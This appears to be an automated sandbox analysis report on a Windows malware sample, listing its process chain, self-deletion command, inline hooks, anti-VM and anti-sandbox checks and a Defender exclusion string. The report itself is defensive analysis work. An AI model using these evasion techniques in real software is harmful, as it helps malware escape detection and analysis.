          Source: XhU4EXUp0x.exe, 00000000.00000002.653535453.00000000026EF000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
          Source: XhU4EXUp0x.exeVirustotal: Detection: 21%
          Source: XhU4EXUp0x.exeReversingLabs: Detection: 26%
          Source: unknownProcess created: C:\Users\user\Desktop\XhU4EXUp0x.exe 'C:\Users\user\Desktop\XhU4EXUp0x.exe'
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess created: C:\Users\user\Desktop\XhU4EXUp0x.exe C:\Users\user\Desktop\XhU4EXUp0x.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exe
          Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\XhU4EXUp0x.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess created: C:\Users\user\Desktop\XhU4EXUp0x.exe C:\Users\user\Desktop\XhU4EXUp0x.exe
          Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\XhU4EXUp0x.exe'
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: XhU4EXUp0x.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: XhU4EXUp0x.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: XhU4EXUp0x.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.669343721.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: C:\Users\Administrator\Desktop\Client\Temp\YfQkSBryuS\src\obj\Debug\ProfileOptimization.pdb source: XhU4EXUp0x.exe
          Source: Binary string: wntdll.pdbUGP source: XhU4EXUp0x.exe, 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, raserver.exe, 0000000C.00000002.912987032.0000000004BFF000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: XhU4EXUp0x.exe, raserver.exe
          Source: Binary string: RAServer.pdb source: XhU4EXUp0x.exe, 00000003.00000002.707590458.000000000169A000.00000004.00000020.sdmp
          Source: Binary string: RAServer.pdbGCTL source: XhU4EXUp0x.exe, 00000003.00000002.707590458.000000000169A000.00000004.00000020.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.669343721.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 0_2_00B5AC80 pushfd ; retn 0004h
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 0_2_00B5ACD1 pushfd ; retn 0004h
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 0_2_00B5AC31 pushfd ; retn 0004h
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 0_2_00B5B1C0 pushfd ; retn 0004h
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 0_2_00B53768 push eax; retn 0004h
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 0_2_0B4E944C push esp; iretd
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0041D069 push esi; ret
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_004080F7 pushad ; retf
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_004169CD push ecx; iretd
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_004169F6 push eax; iretd
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0041DA38 push esi; ret
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0040E2FF push ds; retf
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0041DA97 push esi; ret
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_00417ABB push ebx; iretd
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0041833A push cs; retf
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_004164C5 push es; retf
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0041D4FB push esi; ret
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0041D5C9 push esi; ret
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0041CEF2 push eax; ret
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0041CEFB push eax; ret
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0041CEA5 push eax; ret
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0041CF5C push eax; ret
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0041D7F1 push esi; ret
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0041CF89 push esi; ret
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0041CF96 push esi; ret
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019AD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B5D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_00A980F7 pushad ; retf
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_00AAD069 push esi; ret
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_00AA69F6 push eax; iretd
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_00AA69CD push ecx; iretd
          Source: initial sampleStatic PE information: section name: .text entropy: 7.68116376135

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x85 0x5E 0xE9
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\raserver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 00000000.00000002.653535453.00000000026EF000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: XhU4EXUp0x.exe PID: 6968, type: MEMORY
          Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)Show sources
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeWMI Queries: IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: XhU4EXUp0x.exe, 00000000.00000002.653505336.00000000026B1000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: XhU4EXUp0x.exe, 00000000.00000002.653535453.00000000026EF000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeRDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\raserver.exeRDTSC instruction interceptor: First address: 0000000000A998E4 second address: 0000000000A998EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\raserver.exeRDTSC instruction interceptor: First address: 0000000000A99B4E second address: 0000000000A99B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 name: Identifier
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum name: 0
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_00409A80 rdtsc
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe TID: 6972Thread sleep time: -104441s >= -30000s
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe TID: 7020Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exe TID: 2016Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 3220Thread sleep time: -60000s >= -30000s
          Source: C:\Windows\SysWOW64\raserver.exe TID: 6964Thread sleep time: -65000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeThread delayed: delay time: 104441
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeThread delayed: delay time: 922337203685477
          Source: explorer.exe, 00000005.00000000.680569789.000000000A868000.00000004.00000001.sdmpBinary or memory string: SI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI`=
          Source: XhU4EXUp0x.exe, 00000000.00000002.653357371.0000000000A9F000.00000004.00000020.sdmpBinary or memory string: VMware
          Source: explorer.exe, 00000005.00000000.669123730.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: XhU4EXUp0x.exe, 00000000.00000002.653535453.00000000026EF000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000005.00000000.676990753.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.677547132.000000000A716000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATAa
          Source: XhU4EXUp0x.exe, 00000000.00000002.653505336.00000000026B1000.00000004.00000001.sdmpBinary or memory string: VMWARE
          Source: XhU4EXUp0x.exe, 00000000.00000002.653535453.00000000026EF000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000005.00000000.677547132.000000000A716000.00000004.00000001.sdmpBinary or memory string: ?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&d
          Source: explorer.exe, 00000005.00000000.697429263.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000005.00000000.677547132.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: XhU4EXUp0x.exe, 00000000.00000002.653357371.0000000000A9F000.00000004.00000020.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMwareCWYACNw
          Source: explorer.exe, 00000005.00000000.669123730.00000000058C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: XhU4EXUp0x.exe, 00000000.00000002.653505336.00000000026B1000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: XhU4EXUp0x.exe, 00000000.00000002.653535453.00000000026EF000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: explorer.exe, 00000005.00000000.677896891.000000000A784000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: XhU4EXUp0x.exe, 00000000.00000002.653535453.00000000026EF000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: XhU4EXUp0x.exe, 00000000.00000002.653357371.0000000000A9F000.00000004.00000020.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMwareCWYACNDAWin32_VideoController92RGKB5VVideoController120060621000000.000000-00068978660display.infMSBDACRVZ4Z54PCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsAXM45XBV>K
          Source: explorer.exe, 00000005.00000000.676990753.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: XhU4EXUp0x.exe, 00000000.00000002.653505336.00000000026B1000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: XhU4EXUp0x.exe, 00000000.00000002.653505336.00000000026B1000.00000004.00000001.sdmpBinary or memory string: l%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: XhU4EXUp0x.exe, 00000000.00000002.653535453.00000000026EF000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000005.00000000.669704877.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: XhU4EXUp0x.exe, 00000000.00000002.653535453.00000000026EF000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
          Source: explorer.exe, 00000005.00000000.669123730.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: XhU4EXUp0x.exe, 00000000.00000002.653505336.00000000026B1000.00000004.00000001.sdmpBinary or memory string: l"SOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000005.00000000.669123730.00000000058C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\raserver.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_00409A80 rdtsc
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0040ACC0 LdrLoadDll,
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A149A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A149A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A149A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A149A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01982990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019799BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019799BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019799BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019799BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019799BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019799BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019799BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019799BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019799BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019799BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019799BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019799BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019861A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019861A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0195B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0195B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0195B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019E41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01959100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01959100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01959100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01974120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01974120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01974120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01974120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01974120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0195B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0195B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0195C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01959080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019990AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019EB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019EB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019EB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019EB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019EB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019EB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019540E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019540E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019540E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019558EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019D7016 mov eax, dword ptr fs:[00000030h]
